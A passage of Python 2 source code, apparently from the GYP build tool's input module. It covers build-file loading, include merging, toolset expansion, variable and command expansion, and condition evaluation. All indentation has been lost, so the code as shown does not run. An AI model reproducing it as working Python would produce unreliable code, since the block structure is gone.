is_path_section_match_re = re.compile('_(dir|file|path)s?$')
def IsPathSection(section):
# If section ends in one of these characters, it's applied to a section
# without the trailing characters. '/' is notably absent from this list,
# because there's no way for a regular expression to be treated as a path.
while section[-1:] in is_path_section_charset:
section = section[:-1]
return section in path_sections or is_path_section_match_re.search(section)
# base_non_configuration_keys is a list of key names that belong in the target
# itself and should not be propagated into its configurations. It is merged
# with a list that can come from the generator to
# create non_configuration_keys.
base_non_configuration_keys = [
# Sections that must exist inside targets and not configurations.
'actions',
'configurations',
'copies',
'default_configuration',
'dependencies',
'dependencies_original',
'libraries',
'postbuilds',
'product_dir',
'product_extension',
'product_name',
'product_prefix',
'rules',
'run_as',
'sources',
'standalone_static_library',
'suppress_wildcard',
'target_name',
'toolset',
'toolsets',
'type',
# Sections that can be found inside targets or configurations, but that
# should not be propagated from targets into their configurations.
'variables',
]
non_configuration_keys = []
# Keys that do not belong inside a configuration dictionary.
invalid_configuration_keys = [
'actions',
'all_dependent_settings',
'configurations',
'dependencies',
'direct_dependent_settings',
'libraries',
'link_settings',
'sources',
'standalone_static_library',
'target_name',
'type',
]
# Controls whether or not the generator supports multiple toolsets.
multiple_toolsets = False
# Paths for converting filelist paths to output paths: {
# toplevel,
# qualified_output_dir,
# }
generator_filelist_paths = None
def GetIncludedBuildFiles(build_file_path, aux_data, included=None):
"""Return a list of all build files included into build_file_path.
The returned list will contain build_file_path as well as all other files
that it included, either directly or indirectly. Note that the list may
contain files that were included into a conditional section that evaluated
to false and was not merged into build_file_path's dict.
aux_data is a dict containing a key for each build file or included build
file. Those keys provide access to dicts whose "included" keys contain
lists of all other files included by the build file.
included should be left at its default None value by external callers. It
is used for recursion.
The returned list will not contain any duplicate entries. Each build file
in the list will be relative to the current directory.
"""
if included == None:
included = []
if build_file_path in included:
return included
included.append(build_file_path)
for included_build_file in aux_data[build_file_path].get('included', []):
GetIncludedBuildFiles(included_build_file, aux_data, included)
return included
def CheckedEval(file_contents):
"""Return the eval of a gyp file.
The gyp file is restricted to dictionaries and lists only, and
repeated keys are not allowed.
Note that this is slower than eval() is.
"""
ast = compiler.parse(file_contents)
assert isinstance(ast, Module)
c1 = ast.getChildren()
assert c1[0] is None
assert isinstance(c1[1], Stmt)
c2 = c1[1].getChildren()
assert isinstance(c2[0], Discard)
c3 = c2[0].getChildren()
assert len(c3) == 1
return CheckNode(c3[0], [])
def CheckNode(node, keypath):
if isinstance(node, Dict):
c = node.getChildren()
dict = {}
for n in range(0, len(c), 2):
assert isinstance(c[n], Const)
key = c[n].getChildren()[0]
if key in dict:
raise GypError("Key '" + key + "' repeated at level " +
repr(len(keypath) + 1) + " with key path '" +
'.'.join(keypath) + "'")
kp = list(keypath) # Make a copy of the list for descending this node.
kp.append(key)
dict[key] = CheckNode(c[n + 1], kp)
return dict
elif isinstance(node, List):
c = node.getChildren()
children = []
for index, child in enumerate(c):
kp = list(keypath) # Copy list.
kp.append(repr(index))
children.append(CheckNode(child, kp))
return children
elif isinstance(node, Const):
return node.getChildren()[0]
else:
raise TypeError, "Unknown AST node at key path '" + '.'.join(keypath) + \
"': " + repr(node)
def LoadOneBuildFile(build_file_path, data, aux_data, variables, includes,
is_target, check):
if build_file_path in data:
return data[build_file_path]
if os.path.exists(build_file_path):
build_file_contents = open(build_file_path).read()
else:
raise GypError("%s not found (cwd: %s)" % (build_file_path, os.getcwd()))
build_file_data = None
try:
if check:
build_file_data = CheckedEval(build_file_contents)
else:
build_file_data = eval(build_file_contents, {'__builtins__': None},
None)
except SyntaxError, e:
e.filename = build_file_path
raise
except Exception, e:
gyp.common.ExceptionAppend(e, 'while reading ' + build_file_path)
raise
if not isinstance(build_file_data, dict):
raise GypError("%s does not evaluate to a dictionary." % build_file_path)
data[build_file_path] = build_file_data
aux_data[build_file_path] = {}
# Scan for includes and merge them in.
if ('skip_includes' not in build_file_data or
not build_file_data['skip_includes']):
try:
if is_target:
LoadBuildFileIncludesIntoDict(build_file_data, build_file_path, data,
aux_data, variables, includes, check)
else:
LoadBuildFileIncludesIntoDict(build_file_data, build_file_path, data,
aux_data, variables, None, check)
except Exception, e:
gyp.common.ExceptionAppend(e,
'while reading includes of ' + build_file_path)
raise
return build_file_data
def LoadBuildFileIncludesIntoDict(subdict, subdict_path, data, aux_data,
variables, includes, check):
includes_list = []
if includes != None:
includes_list.extend(includes)
if 'includes' in subdict:
for include in subdict['includes']:
# "include" is specified relative to subdict_path, so compute the real
# path to include by appending the provided "include" to the directory
# in which subdict_path resides.
relative_include = \
os.path.normpath(os.path.join(os.path.dirname(subdict_path), include))
includes_list.append(relative_include)
# Unhook the includes list, it's no longer needed.
del subdict['includes']
# Merge in the included files.
for include in includes_list:
if not 'included' in aux_data[subdict_path]:
aux_data[subdict_path]['included'] = []
aux_data[subdict_path]['included'].append(include)
gyp.DebugOutput(gyp.DEBUG_INCLUDES, "Loading Included File: '%s'", include)
MergeDicts(subdict,
LoadOneBuildFile(include, data, aux_data, variables, None,
False, check),
subdict_path, include)
# Recurse into subdictionaries.
for k, v in subdict.iteritems():
if v.__class__ == dict:
LoadBuildFileIncludesIntoDict(v, subdict_path, data, aux_data, variables,
None, check)
elif v.__class__ == list:
LoadBuildFileIncludesIntoList(v, subdict_path, data, aux_data, variables,
check)
# This recurses into lists so that it can look for dicts.
def LoadBuildFileIncludesIntoList(sublist, sublist_path, data, aux_data,
variables, check):
for item in sublist:
if item.__class__ == dict:
LoadBuildFileIncludesIntoDict(item, sublist_path, data, aux_data,
variables, None, check)
elif item.__class__ == list:
LoadBuildFileIncludesIntoList(item, sublist_path, data, aux_data,
variables, check)
# Processes toolsets in all the targets. This recurses into condition entries
# since they can contain toolsets as well.
def ProcessToolsetsInDict(data):
if 'targets' in data:
target_list = data['targets']
new_target_list = []
for target in target_list:
# If this target already has an explicit 'toolset', and no 'toolsets'
# list, don't modify it further.
if 'toolset' in target and 'toolsets' not in target:
new_target_list.append(target)
continue
if multiple_toolsets:
toolsets = target.get('toolsets', ['target'])
else:
toolsets = ['target']
# Make sure this 'toolsets' definition is only processed once.
if 'toolsets' in target:
del target['toolsets']
if len(toolsets) > 0:
# Optimization: only do copies if more than one toolset is specified.
for build in toolsets[1:]:
new_target = copy.deepcopy(target)
new_target['toolset'] = build
new_target_list.append(new_target)
target['toolset'] = toolsets[0]
new_target_list.append(target)
data['targets'] = new_target_list
if 'conditions' in data:
for condition in data['conditions']:
if isinstance(condition, list):
for condition_dict in condition[1:]:
ProcessToolsetsInDict(condition_dict)
# TODO(mark): I don't love this name. It just means that it's going to load
# a build file that contains targets and is expected to provide a targets dict
# that contains the targets...
def LoadTargetBuildFile(build_file_path, data, aux_data, variables, includes,
depth, check, load_dependencies):
# If depth is set, predefine the DEPTH variable to be a relative path from
# this build file's directory to the directory identified by depth.
if depth:
# TODO(dglazkov) The backslash/forward-slash replacement at the end is a
# temporary measure. This should really be addressed by keeping all paths
# in POSIX until actual project generation.
d = gyp.common.RelativePath(depth, os.path.dirname(build_file_path))
if d == '':
variables['DEPTH'] = '.'
else:
variables['DEPTH'] = d.replace('\\', '/')
if build_file_path in data['target_build_files']:
# Already loaded.
return False
data['target_build_files'].add(build_file_path)
gyp.DebugOutput(gyp.DEBUG_INCLUDES,
"Loading Target Build File '%s'", build_file_path)
build_file_data = LoadOneBuildFile(build_file_path, data, aux_data, variables,
includes, True, check)
# Store DEPTH for later use in generators.
build_file_data['_DEPTH'] = depth
# Set up the included_files key indicating which .gyp files contributed to
# this target dict.
if 'included_files' in build_file_data:
raise GypError(build_file_path + ' must not contain included_files key')
included = GetIncludedBuildFiles(build_file_path, aux_data)
build_file_data['included_files'] = []
for included_file in included:
# included_file is relative to the current directory, but it needs to
# be made relative to build_file_path's directory.
included_relative = \
gyp.common.RelativePath(included_file,
os.path.dirname(build_file_path))
build_file_data['included_files'].append(included_relative)
# Do a first round of toolsets expansion so that conditions can be defined
# per toolset.
ProcessToolsetsInDict(build_file_data)
# Apply "pre"/"early" variable expansions and condition evaluations.
ProcessVariablesAndConditionsInDict(
build_file_data, PHASE_EARLY, variables, build_file_path)
# Since some toolsets might have been defined conditionally, perform
# a second round of toolsets expansion now.
ProcessToolsetsInDict(build_file_data)
# Look at each project's target_defaults dict, and merge settings into
# targets.
if 'target_defaults' in build_file_data:
if 'targets' not in build_file_data:
raise GypError("Unable to find targets in build file %s" %
build_file_path)
index = 0
while index < len(build_file_data['targets']):
# This procedure needs to give the impression that target_defaults is
# used as defaults, and the individual targets inherit from that.
# The individual targets need to be merged into the defaults. Make
# a deep copy of the defaults for each target, merge the target dict
# as found in the input file into that copy, and then hook up the
# copy with the target-specific data merged into it as the replacement
# target dict.
old_target_dict = build_file_data['targets'][index]
new_target_dict = copy.deepcopy(build_file_data['target_defaults'])
MergeDicts(new_target_dict, old_target_dict,
build_file_path, build_file_path)
build_file_data['targets'][index] = new_target_dict
index += 1
# No longer needed.
del build_file_data['target_defaults']
# Look for dependencies. This means that dependency resolution occurs
# after "pre" conditionals and variable expansion, but before "post" -
# in other words, you can't put a "dependencies" section inside a "post"
# conditional within a target.
dependencies = []
if 'targets' in build_file_data:
for target_dict in build_file_data['targets']:
if 'dependencies' not in target_dict:
continue
for dependency in target_dict['dependencies']:
dependencies.append(
gyp.common.ResolveTarget(build_file_path, dependency, None)[0])
if load_dependencies:
for dependency in dependencies:
try:
LoadTargetBuildFile(dependency, data, aux_data, variables,
includes, depth, check, load_dependencies)
except Exception, e:
gyp.common.ExceptionAppend(
e, 'while loading dependencies of %s' % build_file_path)
raise
else:
return (build_file_path, dependencies)
def CallLoadTargetBuildFile(global_flags,
build_file_path, data,
aux_data, variables,
includes, depth, check,
generator_input_info):
"""Wrapper around LoadTargetBuildFile for parallel processing.
This wrapper is used when LoadTargetBuildFile is executed in
a worker process.
"""
try:
signal.signal(signal.SIGINT, signal.SIG_IGN)
# Apply globals so that the worker process behaves the same.
for key, value in global_flags.iteritems():
globals()[key] = value
# Save the keys so we can return data that changed.
data_keys = set(data)
aux_data_keys = set(aux_data)
SetGeneratorGlobals(generator_input_info)
result = LoadTargetBuildFile(build_file_path, data,
aux_data, variables,
includes, depth, check, False)
if not result:
return result
(build_file_path, dependencies) = result
data_out = {}
for key in data:
if key == 'target_build_files':
continue
if key not in data_keys:
data_out[key] = data[key]
aux_data_out = {}
for key in aux_data:
if key not in aux_data_keys:
aux_data_out[key] = aux_data[key]
# This gets serialized and sent back to the main process via a pipe.
# It's handled in LoadTargetBuildFileCallback.
return (build_file_path,
data_out,
aux_data_out,
dependencies)
except GypError, e:
sys.stderr.write("gyp: %s\n" % e)
return None
except Exception, e:
print >>sys.stderr, 'Exception:', e
print >>sys.stderr, traceback.format_exc()
return None
class ParallelProcessingError(Exception):
pass
class ParallelState(object):
"""Class to keep track of state when processing input files in parallel.
If build files are loaded in parallel, use this to keep track of
state during farming out and processing parallel jobs. It's stored
in a global so that the callback function can have access to it.
"""
def __init__(self):
# The multiprocessing pool.
self.pool = None
# The condition variable used to protect this object and notify
# the main loop when there might be more data to process.
self.condition = None
# The "data" dict that was passed to LoadTargetBuildFileParallel
self.data = None
# The "aux_data" dict that was passed to LoadTargetBuildFileParallel
self.aux_data = None
# The number of parallel calls outstanding; decremented when a response
# was received.
self.pending = 0
# The set of all build files that have been scheduled, so we don't
# schedule the same one twice.
self.scheduled = set()
# A list of dependency build file paths that haven't been scheduled yet.
self.dependencies = []
# Flag to indicate if there was an error in a child process.
self.error = False
def LoadTargetBuildFileCallback(self, result):
"""Handle the results of running LoadTargetBuildFile in another process.
"""
self.condition.acquire()
if not result:
self.error = True
self.condition.notify()
self.condition.release()
return
(build_file_path0, data0, aux_data0, dependencies0) = result
self.data['target_build_files'].add(build_file_path0)
for key in data0:
self.data[key] = data0[key]
for key in aux_data0:
self.aux_data[key] = aux_data0[key]
for new_dependency in dependencies0:
if new_dependency not in self.scheduled:
self.scheduled.add(new_dependency)
self.dependencies.append(new_dependency)
self.pending -= 1
self.condition.notify()
self.condition.release()
def LoadTargetBuildFilesParallel(build_files, data, aux_data,
variables, includes, depth, check,
generator_input_info):
parallel_state = ParallelState()
parallel_state.condition = threading.Condition()
# Make copies of the build_files argument that we can modify while working.
parallel_state.dependencies = list(build_files)
parallel_state.scheduled = set(build_files)
parallel_state.pending = 0
parallel_state.data = data
parallel_state.aux_data = aux_data
try:
parallel_state.condition.acquire()
while parallel_state.dependencies or parallel_state.pending:
if parallel_state.error:
break
if not parallel_state.dependencies:
parallel_state.condition.wait()
continue
dependency = parallel_state.dependencies.pop()
parallel_state.pending += 1
data_in = {}
data_in['target_build_files'] = data['target_build_files']
aux_data_in = {}
global_flags = {
'path_sections': globals()['path_sections'],
'non_configuration_keys': globals()['non_configuration_keys'],
'multiple_toolsets': globals()['multiple_toolsets']}
if not parallel_state.pool:
parallel_state.pool = multiprocessing.Pool(8)
parallel_state.pool.apply_async(
CallLoadTargetBuildFile,
args = (global_flags, dependency,
data_in, aux_data_in,
variables, includes, depth, check, generator_input_info),
callback = parallel_state.LoadTargetBuildFileCallback)
except KeyboardInterrupt, e:
parallel_state.pool.terminate()
raise e
parallel_state.condition.release()
parallel_state.pool.close()
parallel_state.pool.join()
parallel_state.pool = None
if parallel_state.error:
sys.exit(1)
# Look for the bracket that matches the first bracket seen in a
# string, and return the start and end as a tuple. For example, if
# the input is something like "<(foo <(bar)) blah", then it would
# return (1, 13), indicating the entire string except for the leading
# "<" and trailing " blah".
LBRACKETS= set('{[(')
BRACKETS = {'}': '{', ']': '[', ')': '('}
def FindEnclosingBracketGroup(input_str):
stack = []
start = -1
for index, char in enumerate(input_str):
if char in LBRACKETS:
stack.append(char)
if start == -1:
start = index
elif char in BRACKETS:
if not stack:
return (-1, -1)
if stack.pop() != BRACKETS[char]:
return (-1, -1)
if not stack:
return (start, index + 1)
return (-1, -1)
canonical_int_re = re.compile('(0|-?[1-9][0-9]*)$')
def IsStrCanonicalInt(string):
"""Returns True if |string| is in its canonical integer form.
The canonical form is such that str(int(string)) == string.
"""
return isinstance(string, str) and canonical_int_re.match(string)
# This matches things like "<(asdf)", "<!(cmd)", "<!@(cmd)", "<|(list)",
# "<!interpreter(arguments)", "<([list])", and even "<([)" and "<(<())".
# In the last case, the inner "<()" is captured in match['content'].
early_variable_re = re.compile(
'(?P<replace>(?P<type><(?:(?:!?@?)|\|)?)'
'(?P<command_string>[-a-zA-Z0-9_.]+)?'
'\((?P<is_array>\s*\[?)'
'(?P<content>.*?)(\]?)\))')
# This matches the same as early_variable_re, but with '>' instead of '<'.
late_variable_re = re.compile(
'(?P<replace>(?P<type>>(?:(?:!?@?)|\|)?)'
'(?P<command_string>[-a-zA-Z0-9_.]+)?'
'\((?P<is_array>\s*\[?)'
'(?P<content>.*?)(\]?)\))')
# This matches the same as early_variable_re, but with '^' instead of '<'.
latelate_variable_re = re.compile(
'(?P<replace>(?P<type>[\^](?:(?:!?@?)|\|)?)'
'(?P<command_string>[-a-zA-Z0-9_.]+)?'
'\((?P<is_array>\s*\[?)'
'(?P<content>.*?)(\]?)\))')
# Global cache of results from running commands so they don't have to be run
# more then once.
cached_command_results = {}
def FixupPlatformCommand(cmd):
if sys.platform == 'win32':
if type(cmd) == list:
cmd = [re.sub('^cat ', 'type ', cmd[0])] + cmd[1:]
else:
cmd = re.sub('^cat ', 'type ', cmd)
return cmd
PHASE_EARLY = 0
PHASE_LATE = 1
PHASE_LATELATE = 2
def ExpandVariables(input, phase, variables, build_file):
# Look for the pattern that gets expanded into variables
if phase == PHASE_EARLY:
variable_re = early_variable_re
expansion_symbol = '<'
elif phase == PHASE_LATE:
variable_re = late_variable_re
expansion_symbol = '>'
elif phase == PHASE_LATELATE:
variable_re = latelate_variable_re
expansion_symbol = '^'
else:
assert False
input_str = str(input)
if IsStrCanonicalInt(input_str):
return int(input_str)
# Do a quick scan to determine if an expensive regex search is warranted.
if expansion_symbol not in input_str:
return input_str
# Get the entire list of matches as a list of MatchObject instances.
# (using findall here would return strings instead of MatchObjects).
matches = list(variable_re.finditer(input_str))
if not matches:
return input_str
output = input_str
# Reverse the list of matches so that replacements are done right-to-left.
# That ensures that earlier replacements won't mess up the string in a
# way that causes later calls to find the earlier substituted text instead
# of what's intended for replacement.
matches.reverse()
for match_group in matches:
match = match_group.groupdict()
gyp.DebugOutput(gyp.DEBUG_VARIABLES, "Matches: %r", match)
# match['replace'] is the substring to look for, match['type']
# is the character code for the replacement type (< > <! >! <| >| <@
# >@ <!@ >!@), match['is_array'] contains a '[' for command
# arrays, and match['content'] is the name of the variable (< >)
# or command to run (<! >!). match['command_string'] is an optional
# command string. Currently, only 'pymod_do_main' is supported.
# run_command is true if a ! variant is used.
run_command = '!' in match['type']
command_string = match['command_string']
# file_list is true if a | variant is used.
file_list = '|' in match['type']
# Capture these now so we can adjust them later.
replace_start = match_group.start('replace')
replace_end = match_group.end('replace')
# Find the ending paren, and re-evaluate the contained string.
(c_start, c_end) = FindEnclosingBracketGroup(input_str[replace_start:])
# Adjust the replacement range to match the entire command
# found by FindEnclosingBracketGroup (since the variable_re
# probably doesn't match the entire command if it contained
# nested variables).
replace_end = replace_start + c_end
# Find the "real" replacement, matching the appropriate closing
# paren, and adjust the replacement start and end.
replacement = input_str[replace_start:replace_end]
# Figure out what the contents of the variable parens are.
contents_start = replace_start + c_start + 1
contents_end = replace_end - 1
contents = input_str[contents_start:contents_end]
# Do filter substitution now for <|().
# Admittedly, this is different than the evaluation order in other
# contexts. However, since filtration has no chance to run on <|(),
# this seems like the only obvious way to give them access to filters.
if file_list:
processed_variables = copy.deepcopy(variables)
ProcessListFiltersInDict(contents, processed_variables)
# Recurse to expand variables in the contents
contents = ExpandVariables(contents, phase,
processed_variables, build_file)
else:
# Recurse to expand variables in the contents
contents = ExpandVariables(contents, phase, variables, build_file)
# Strip off leading/trailing whitespace so that variable matches are
# simpler below (and because they are rarely needed).
contents = contents.strip()
# expand_to_list is true if an @ variant is used. In that case,
# the expansion should result in a list. Note that the caller
# is to be expecting a list in return, and not all callers do
# because not all are working in list context. Also, for list
# expansions, there can be no other text besides the variable
# expansion in the input string.
expand_to_list = '@' in match['type'] and input_str == replacement
if run_command or file_list:
# Find the build file's directory, so commands can be run or file lists
# generated relative to it.
build_file_dir = os.path.dirname(build_file)
if build_file_dir == '' and not file_list:
# If build_file is just a leaf filename indicating a file in the
# current directory, build_file_dir might be an empty string. Set
# it to None to signal to subprocess.Popen that it should run the
# command in the current directory.
build_file_dir = None
# Support <|(listfile.txt ...) which generates a file
# containing items from a gyp list, generated at gyp time.
# This works around actions/rules which have more inputs than will
# fit on the command line.
if file_list:
if type(contents) == list:
contents_list = contents
else:
contents_list = contents.split(' ')
replacement = contents_list[0]
if os.path.isabs(replacement):
raise GypError('| cannot handle absolute paths, got "%s"' % replacement)
if not generator_filelist_paths:
path = os.path.join(build_file_dir, replacement)
else:
if os.path.isabs(build_file_dir):
toplevel = generator_filelist_paths['toplevel']
rel_build_file_dir = gyp.common.RelativePath(build_file_dir, toplevel)
else:
rel_build_file_dir = build_file_dir
qualified_out_dir = generator_filelist_paths['qualified_out_dir']
path = os.path.join(qualified_out_dir, rel_build_file_dir, replacement)
gyp.common.EnsureDirExists(path)
replacement = gyp.common.RelativePath(path, build_file_dir)
f = gyp.common.WriteOnDiff(path)
for i in contents_list[1:]:
f.write('%s\n' % i)
f.close()
elif run_command:
use_shell = True
if match['is_array']:
contents = eval(contents)
use_shell = False
# Check for a cached value to avoid executing commands, or generating
# file lists more than once.
# TODO(http://code.google.com/p/gyp/issues/detail?id=112): It is
# possible that the command being invoked depends on the current
# directory. For that case the syntax needs to be extended so that the
# directory is also used in cache_key (it becomes a tuple).
# TODO(http://code.google.com/p/gyp/issues/detail?id=111): In theory,
# someone could author a set of GYP files where each time the command
# is invoked it produces different output by design. When the need
# arises, the syntax should be extended to support no caching off a
# command's output so it is run every time.
cache_key = str(contents)
cached_value = cached_command_results.get(cache_key, None)
if cached_value is None:
gyp.DebugOutput(gyp.DEBUG_VARIABLES,
"Executing command '%s' in directory '%s'",
contents, build_file_dir)
replacement = ''
if command_string == 'pymod_do_main':
# <!pymod_do_main(modulename param eters) loads |modulename| as a
# python module and then calls that module's DoMain() function,
# passing ["param", "eters"] as a single list argument. For modules
# that don't load quickly, this can be faster than
# <!(python modulename param eters). Do this in |build_file_dir|.
oldwd = os.getcwd() # Python doesn't like os.open('.'): no fchdir.
if build_file_dir: # build_file_dir may be None (see above).
os.chdir(build_file_dir)
try:
parsed_contents = shlex.split(contents)
try:
py_module = __import__(parsed_contents[0])
except ImportError as e:
raise GypError("Error importing pymod_do_main"
"module (%s): %s" % (parsed_contents[0], e))
replacement = str(py_module.DoMain(parsed_contents[1:])).rstrip()
finally:
os.chdir(oldwd)
assert replacement != None
elif command_string:
raise GypError("Unknown command string '%s' in '%s'." %
(command_string, contents))
else:
# Fix up command with platform specific workarounds.
contents = FixupPlatformCommand(contents)
p = subprocess.Popen(contents, shell=use_shell,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,
cwd=build_file_dir)
p_stdout, p_stderr = p.communicate('')
if p.wait() != 0 or p_stderr:
sys.stderr.write(p_stderr)
# Simulate check_call behavior, since check_call only exists
# in python 2.5 and later.
raise GypError("Call to '%s' returned exit status %d." %
(contents, p.returncode))
replacement = p_stdout.rstrip()
cached_command_results[cache_key] = replacement
else:
gyp.DebugOutput(gyp.DEBUG_VARIABLES,
"Had cache value for command '%s' in directory '%s'",
contents,build_file_dir)
replacement = cached_value
else:
if not contents in variables:
if contents[-1] in ['!', '/']:
# In order to allow cross-compiles (nacl) to happen more naturally,
# we will allow references to >(sources/) etc. to resolve to
# and empty list if undefined. This allows actions to:
# 'action!': [
# '>@(_sources!)',
# ],
# 'action/': [
# '>@(_sources/)',
# ],
replacement = []
else:
raise GypError('Undefined variable ' + contents +
' in ' + build_file)
else:
replacement = variables[contents]
if isinstance(replacement, list):
for item in replacement:
if (not contents[-1] == '/' and
not isinstance(item, str) and not isinstance(item, int)):
raise GypError('Variable ' + contents +
' must expand to a string or list of strings; ' +
'list contains a ' +
item.__class__.__name__)
# Run through the list and handle variable expansions in it. Since
# the list is guaranteed not to contain dicts, this won't do anything
# with conditions sections.
ProcessVariablesAndConditionsInList(replacement, phase, variables,
build_file)
elif not isinstance(replacement, str) and \
not isinstance(replacement, int):
raise GypError('Variable ' + contents +
' must expand to a string or list of strings; ' +
'found a ' + replacement.__class__.__name__)
if expand_to_list:
# Expanding in list context. It's guaranteed that there's only one
# replacement to do in |input_str| and that it's this replacement. See
# above.
if isinstance(replacement, list):
# If it's already a list, make a copy.
output = replacement[:]
else:
# Split it the same way sh would split arguments.
output = shlex.split(str(replacement))
else:
# Expanding in string context.
encoded_replacement = ''
if isinstance(replacement, list):
# When expanding a list into string context, turn the list items
# into a string in a way that will work with a subprocess call.
#
# TODO(mark): This isn't completely correct. This should
# call a generator-provided function that observes the
# proper list-to-argument quoting rules on a specific
# platform instead of just calling the POSIX encoding
# routine.
encoded_replacement = gyp.common.EncodePOSIXShellList(replacement)
else:
encoded_replacement = replacement
output = output[:replace_start] + str(encoded_replacement) + \
output[replace_end:]
# Prepare for the next match iteration.
input_str = output
# Look for more matches now that we've replaced some, to deal with
# expanding local variables (variables defined in the same
# variables block as this one).
gyp.DebugOutput(gyp.DEBUG_VARIABLES, "Found output %r, recursing.", output)
if isinstance(output, list):
if output and isinstance(output[0], list):
# Leave output alone if it's a list of lists.
# We don't want such lists to be stringified.
pass
else:
new_output = []
for item in output:
new_output.append(
ExpandVariables(item, phase, variables, build_file))
output = new_output
else:
output = ExpandVariables(output, phase, variables, build_file)
# Convert all strings that are canonically-represented integers into integers.
if isinstance(output, list):
for index in xrange(0, len(output)):
if IsStrCanonicalInt(output[index]):
output[index] = int(output[index])
elif IsStrCanonicalInt(output):
output = int(output)
return output
def ProcessConditionsInDict(the_dict, phase, variables, build_file):
# Process a 'conditions' or 'target_conditions' section in the_dict,
# depending on phase.
# early -> conditions
# late -> target_conditions
# latelate -> no conditions
#
# Each item in a conditions list consists of cond_expr, a string expression
# evaluated as the condition, and true_dict, a dict that will be merged into
# the_dict if cond_expr evaluates to true. Optionally, a third item,
# false_dict, may be present. false_dict is merged into the_dict if
# cond_expr evaluates to false.
#
# Any dict merged into the_dict will be recursively processed for nested
# conditionals and other expansions, also according to phase, immediately
# prior to being merged.
if phase == PHASE_EARLY:
conditions_key = 'conditions'
elif phase == PHASE_LATE:
conditions_key = 'target_conditions'
elif phase == PHASE_LATELATE:
return
else:
assert False
if not conditions_key in the_dict:
return
conditions_list = the_dict[conditions_key]
# Unhook the conditions list, it's no longer needed.
del the_dict[conditions_key]
for condition in conditions_list:
if not isinstance(condition, list):
raise GypError(conditions_key + ' must be a list')
if len(condition) != 2 and len(condition) != 3:
# It's possible that condition[0] won't work in which case this
# attempt will raise its own IndexError. That's probably fine.
raise GypError(conditions_key + ' ' + condition[0] +
' must be length 2 or 3, not ' + str(len(condition)))
[cond_expr, true_dict] = condition[0:2]
false_dict = None
if len(condition) == 3:
false_dict = condition[2]
# Do expansions on the condition itself. Since the conditon can naturally
# contain variable references without needing to resort to GYP expansion
# syntax, this is of dubious value for variables, but someone might want to
# use a command expansion directly inside a condition.
cond_expr_expanded = ExpandVariables(cond_expr, phase, variables,
build_file)
if not isinstance(cond_expr_expanded, str) and \
not isinstance(cond_expr_expanded, int):
raise ValueError, \
'Variable expansion in this context permits str and int ' + \
'only, found ' + expanded.__class__.__name__
try:
ast_code = compile(cond_expr_expanded, '<string>', 'eval')
if eval(ast_code, {'__builtins__': None}, variables):
merge_dict = true_dict
else:
merge_dict = false_dict
except SyntaxError, e:
syntax_error = SyntaxError('%s while evaluating condition \'%s\' in %s '
'at character %d.' %
(str(e.args[0]), e.text, build_file, e.offset),
e.filename, e.lineno, e.offset, e.text)
raise syntax_error
except NameError, e:
gyp.common.ExceptionAppend(e, 'while evaluating condition \'%s\' in %s' %
(cond_expr_expanded, build_file))
raise GypError(e)
if merge_dict != None:
# Expand variables and nested conditinals in the merge_dict before
# merging it.
ProcessVariablesAndConditionsInDict(merge_dict, phase,
variables, build_file)
MergeDicts(the_dict, merge_dict, build_file, build_file)
def LoadAutomaticVariablesFromDict(variables, the_dict):
# Any keys with plain string values in the_dict become automatic variables.
# The variable name is the key name with a "_" character prepended.
for key, value in the_dict.iteritems():
if isinstance(value, str) or isinstance(value, int) or \
isinstance(value, list):
variables['_' + key] = value
def LoadVariablesFromVariablesDict(variables, the_dict, the_dict_key):
# Any keys in the_dict's "variables" dict, if it has one, becomes a
# variable. The variable name is the key name in the "variables" dict.
# Variables that end with the % character are set only if they are unset in
# the variables dict. the_dict_key is the name of the key that accesses
# the_dict in the_dict's parent dict. If the_dict's parent is not a dict
# (it could be a list or it could be parentless because it is a root dict),
# the_dict_key will be None.
for key, value in the_dict.get('variables', {}).iteritems():
if not isinstance(value, str) and not isinstance(value, int) and \
not isinstance(value, list):
continue
if key.endswith('%'):
variable_name = key[:-1]
if variable_name in variables:
# If the variable is already set, don't set it.
continue
if the_dict_key is 'variables' and variable_name in the_dict:
# If the variable is set without a % in the_dict, and the_dict is a
# variables dict (making |variables| a varaibles sub-dict of a
# variables dict), use the_dict's definition.
value = the_dict[variable_name]
else:
variable_name = key
variables[variable_name] = value
def ProcessVariablesAndConditionsInDict(the_dict, phase, variables_in,
build_file, the_dict_key=None):
"""Handle all variable and command expansion and conditional evaluation.
This function is the public entry point for all variable expansions and
conditional evaluations. The variables_in dictionary will not be modified
by this function.
"""
# Make a copy of the variables_in dict that can be modified during the
# loading of automatics and the loading of the variables dict.
variables = variables_in.copy()
LoadAutomaticVariablesFromDict(variables, the_dict)
if 'variables' in the_dict:
# Make sure all the local variables are added to the variables
# list before we process them so that you can reference one
# variable from another. They will be fully expanded by recursion
# in ExpandVariables.
for key, value in the_dict['variables'].iteritems():
variables[key] = value
# Handle the associated variables dict first, so that any variable
# references within can be resolved prior to using them as variables.
# Pass a copy of the variables dict to avoid having it be tainted.
# Otherwise, it would have extra automatics added for everything that
# should just be an ordinary variable in this scope.
ProcessVariablesAndConditionsInDict(the_dict['variables'], phase,
variables, build_file, 'variables')
LoadVariablesFromVariablesDict(variables, the_dict, the_dict_key)
for key, value in the_dict.iteritems():
# Skip "variables", which was already processed if present.
if key != 'variables' and isinstance(value, str):
expanded = ExpandVariables(value, phase, variables, build_file)
if not isinstance(expanded, str) and not isinstance(expanded, int):
raise ValueError, \
'Variable expansion in this context permits str and int ' + \
'only, found ' + expanded.__class__.__name__ + ' for ' + key
the_dict[key] = expanded
# Variable expansion may have resulted in changes to automatics. Reload.
# TODO(mark): Optimization: only reload if no changes were made.
variables = variables_in.copy()
LoadAutomaticVariablesFromDict(variables, the_dict)
LoadVariablesFromVariablesDict(variables, the_dict, the_dict_key)
# Process conditions in this dict. This is done after variable expansion
# so that conditions may take advantage of expanded variables. For example,
# if the_dict contains:
# {'type': '<(library_type)',
# 'conditions': [['_type=="static_library"', { ... }]]},
# _type, as used in the condition, will only be set to the value of
# library_type if variable expansion is performed before condition
# processing. However, condition processing should occur prior to recursion
# so that variables (both automatic and "variables" dict type) may be
# adjusted by conditions sections, merged into the_dict, and have the
# intended impact on contained dicts.
#
# This arrangement means that a "conditions" section containing a "variables"
# section will only have those variables effective in subdicts, not in
# the_dict. The workaround is to put a "conditions" section within a
# "variables" section. For example:
# {'conditions': [['os=="mac"', {'variables': {'define': 'IS_MAC'}}]],
# 'defines': ['<(define)'],
# 'my_subdict': {'defines': ['<(define)']}},
# will not result in "IS_MAC" being appended to the "defines" list in the
# current scope but would result in it being appended to the "defines" list
# within "my_subdict". By comparison:
